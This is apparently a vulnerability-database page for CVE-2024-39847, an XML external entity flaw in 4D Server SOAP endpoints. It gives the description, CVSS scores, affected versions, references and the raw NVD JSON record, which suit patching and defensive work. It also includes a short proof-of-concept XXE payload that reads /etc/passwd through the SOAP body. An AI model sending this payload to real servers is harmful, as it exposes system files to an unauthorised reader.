CVE-2024-39847

Description

Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:4d:server:20:r3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:4d:server:20:r4:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:4d:server:20:r6:*:*:*:*:*:* - VULNERABLE

4D v20 < R6

4D v19 < R11

4D v18 LTS < R7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2024-39847 (4D Server XXE)
Target: 4D Server SOAP Endpoint
-->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SomeOperation>
      <parameter>&xxe;</parameter>
    </SomeOperation>
  </soap:Body>
</soap:Envelope>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-39847
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-39847
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-39847/
[4] VulDB https://vuldb.com/cve/CVE-2024-39847
[5] https://4d.com
[6] https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/
[7] http://seclists.org/fulldisclosure/2026/May/0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-39847", "sourceIdentifier": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "published": "2026-04-30T07:16:36.143", "lastModified": "2026-05-17T23:17:02.123", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services."}], "metrics": {"cvssMetricV40": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r3:*:*:*:*:*:*", "matchCriteriaId": "7CB9D8C6-82C3-4C82-92CC-36E27D0AEBC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r4:*:*:*:*:*:*", "matchCriteriaId": "B1C45F4F-AE28-4B0D-BCCC-648953FC9772"}, {"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r6:*:*:*:*:*:*", "matchCriteriaId": "5512EA72-DE0B-4A44-AD7D-F8D277541F65"}]}]}], "references": [{"url": "https://4d.com", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Product"]}, {"url": "https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/May/0", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}